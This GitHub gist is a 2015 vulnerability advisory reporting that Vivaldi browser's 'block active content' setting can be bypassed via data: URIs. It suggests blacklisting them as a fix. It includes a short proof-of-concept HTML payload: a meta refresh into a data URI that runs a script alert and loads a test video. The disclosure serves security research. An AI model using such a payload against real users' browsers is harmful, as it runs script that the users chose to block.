Created
November 3, 2015 07:08
-
-
Save xsuperbug/7046b8b9e6ba56dd9acb to your computer and use it in GitHub Desktop.
Active Content Blocking Bypass via Data URIs in Vivaldi Browser
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Name : Active Content Blocking Bypass via Data URIs in Vivaldi Browser | |
| Software : Vivaldi Browser 1.0.83.38 (Developer Build) stable | |
| Vendor Homepage : http://www.vivaldi.net | |
| Vulnerability Type : Cross-Site Scripting | |
| Researcher : Evren Yalçın <evren [at] superbug [dot] co> | |
| Description | |
| Vivaldi is a freeware web browser developed by Vivaldi Technologies, a company founded by former co-founder and CEO of Opera, Jon Stephenson von Tetzchner.The project's slogan is "A new browser for our friends", and the browser is aimed at hardcore technologists, heavy internet users, and previous Opera browser users disgruntled by Opera's transition from the Presto engine to Blink, which removed many popular features. | |
| Details | |
| "block active content" can be bypassed using data:URI. This allows a website to execute malicious JavaScript. To mitigate this issue the "data:URI " should be blacklisted. | |
| Example PoC is as follows : | |
| <meta http-equiv="refresh" content="0; | |
| url=data:text/html,<script>alert(1)</script><video | |
| src='http://html5sec.org/leak.mp4'></video>"> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment